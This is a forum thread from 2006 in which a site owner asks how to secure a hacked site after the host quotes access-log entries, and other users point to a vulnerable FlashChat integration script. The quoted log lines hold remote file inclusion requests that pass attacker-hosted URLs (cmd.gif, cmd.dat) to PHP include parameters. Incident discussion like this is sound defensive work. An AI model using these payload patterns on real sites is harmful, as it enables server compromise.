Hacked... need help securing!

[alma townsend]

I was just sent this from my host and need to know how I can secure the photopost access they mention. Any help is appreciated. If not corrected, they say they can terminate my service

"It has come to our attention that your web space has been hacked:

213.140.19.121 - - [20/Sep/2006:06:49:26 -0400] "GET
/photopost/index.php?cat=http://busca.uol.com.br/uol/index.html?&cmd=id
HTTP/1.1" 200 74648 thescraphabit.com "-" "-" "-"
69.199.17.144 - - [20/Sep/2006:12:07:14 -0400] "GET
/store/certificates.php?Inc_Dir=http://cygnuspace.com/cmd.gif? HTTP/1.1"
200 2318 www.thescraphabit.com "-" "libwww-perl/5.65" "-"
66.79.167.236 - - [20/Sep/2006:14:11:24 -0400] "GET
/chat/inc/cmses/aedatingCMS.php?dir[inc]=http://www.acuariopeces.com/pnT
emp/cmd.dat?? HTTP/1.1" 200 2326 www.thescraphabit.com "-"
"libwww-perl/5.805" "-"
--
The above was taken from your access logs. It shows that
/photopost/index.php, /store/certificates.php,
/chat/inc/cmses/aedatingCMS.php were used to perpetrate the hack. "

[Chuck S]

Hello what version of photopost you using? If it is version 5 or above they can type that all they want and its not going to do anything since cat is typecast as an interger on that index script

[Michael P]

/chat/inc/cmses/aedatingCMS.php

Thats the file my server was hacked with (and alot of other people's); just because the photopost URL was called like that doesn't mean they got in. If you are running a version from even the past year that command failed and they got in from your aedatingCMS.php script.

[alma townsend]

I am running Photopost 5.31

I don't know what aedatingCMS.php script is, so I will do some searching and hope to find a way to prevent this again.

Thanks

[Michael P]

It's part of the flashchat program; in your src/cmses directory you should only have the one integration script you are using. FlashChat released an update a little while back, but not before alot of sites had been compromised; mine included.